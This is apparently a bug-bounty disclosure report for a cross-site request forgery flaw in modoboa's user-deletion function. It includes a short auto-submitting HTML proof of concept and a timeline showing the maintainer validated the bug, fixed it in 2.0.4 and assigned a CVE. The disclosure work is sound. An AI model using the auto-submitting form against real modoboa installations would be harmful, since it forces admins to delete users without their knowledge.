CSRF leading to delete a user in modoboa/modoboa

Valid

Reported on

Jan 18th 2023

Description

The deleting a user functionality is vulnerable to a CSRF attack.

The cause is same with the deleting a domain functionality.

Proof of Concept

  1. Login as admin.
  2. Create a user to be deleted. E.g. the user ID is 2.
  3. Open the following file in the browser.
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/admin/accounts/2/delete/">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

An attacker can force a victim to delete users.

We are processing your report and will contact the modoboa team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the modoboa team and are waiting to hear back a year ago
modoboa/modoboa maintainer validated this vulnerability a year ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
modoboa/modoboa maintainer
a year ago

Maintainer

A PR containing a fix is available here: https://github.com/modoboa/modoboa/pull/2753

bAu
a year ago

Researcher

@maintainer Looks good :)

modoboa/modoboa maintainer marked this as fixed in 2.0.4 with commit 7f0573 a year ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
modoboa/modoboa maintainer published this vulnerability a year ago
to join this conversation